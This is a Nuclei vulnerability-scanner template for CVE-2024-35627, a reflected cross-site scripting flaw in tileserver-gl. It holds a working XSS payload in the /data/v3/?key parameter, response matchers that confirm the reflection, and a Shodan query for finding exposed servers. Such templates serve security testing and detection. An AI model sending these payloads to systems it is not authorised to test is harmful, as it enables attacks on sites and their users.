nuclei-templates/http/cves/2024/CVE-2024-35627.yaml

44 lines
1.2 KiB
YAML

id: CVE-2024-35627
info:
name: TileServer API - Cross Site Scripting
author: DhiyaneshDK
severity: medium
description: |
tileserver-gl up to v4.4.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /data/v3/?key.
reference:
- https://gist.github.com/SaleSlave/e23d49e7f8eb937784d15c2c2fc34fca
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-35627
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1258058404
tags: cve,cve2024,tileserver,xss
http:
- method: GET
path:
- "{{BaseURL}}/data/v3/?key=%27-alert(document.domain)-%27"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "TileServer"
- "'-alert(document.domain)-'"
condition: and
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502206975838feae731d66008e293210c9feff0b6d882ee23a0f4d6f986fce8220e0a022100c701a9fc226c02f1e59316bc7e8583e44acd8842da99422bab4ff8375215aa26:922c64590222798bb761d5b6d8e72950